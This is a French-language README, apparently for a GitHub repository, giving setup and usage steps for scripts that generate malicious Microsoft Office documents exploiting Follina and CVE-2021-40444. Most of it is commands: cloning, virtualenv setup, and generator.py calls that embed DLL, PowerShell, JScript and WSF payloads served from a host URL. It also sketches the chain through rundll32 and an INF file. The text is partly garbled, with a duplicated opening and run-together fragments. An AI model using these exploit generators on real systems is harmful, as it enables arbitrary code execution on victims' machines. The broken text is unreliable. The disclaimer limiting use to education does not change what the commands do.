
Ce dépôt contient des scripts et des ressources pour exploiter les vulnérabilités Follina CVE et CVE-2021-40444 dans Microsoft Office. Les scripts génèrent des fichiers de documents malveillants capables d'exécuter du code arbitraire sur le système cible.
Ce dépôt contient des scripts et des ressources pour exploiter les vulnérabilités Follina CVE et CVE-2021-40444 dans Microsoft Office. Les scripts génèrent des fichiers de documents malveillants capables d'exécuter du code arbitraire sur le système cible.
requirements.txt)Configuration de Flare VM :
labpasswordPython et environnement virtuel :
git clone https://github.com/basim-ahmad/Follina-CVE-and-CVE-2021-40444.git
cd CVE-2021-40444
virtualenv à l'aide de la commande suivante :
pip install virtualenv
venv :
python -m virtualenv venv
venv\Scripts\activate.bat
pip install -r requirements.txt
Génération de l'exploit :
python generator.py -u http://192.168.197.132 -P test\calc.dll --host
192.168.197.132 par votre adresse IP.Accès au document généré :
.docx généré se trouvera dans le répertoire :
C:\Users\Lab\Desktop\project\CVE-2021-40444\out\document.docx
.docx) est ouvert.document.xml.rels.%TEMP%Low.rundll32 à charger latéralement le fichier INF.generator.pycab_parser.pyrequirements.txt.python generator.py -u http://127.0.0.1 -P test\calc.dll --host
python generator.py -u http://127.0.0.1 -P test\calc.ps1 --no-cab --host --convert
python generator.py -u http://127.0.0.1 -P test\calc.js --no-cab --host -t
python generator.py -u http://127.0.0.1 -P test\job-jscript.wsf --no-cab --host -t
Ce projet est uniquement à des fins éducatives. Utilisez-le de manière responsable et n'exploitez pas les vulnérabilités sur des systèmes pour lesquels vous n'avez pas l'autorisation de tester. Une mauvaise utilisation de ces informations peut entraîner des poursuites pénales.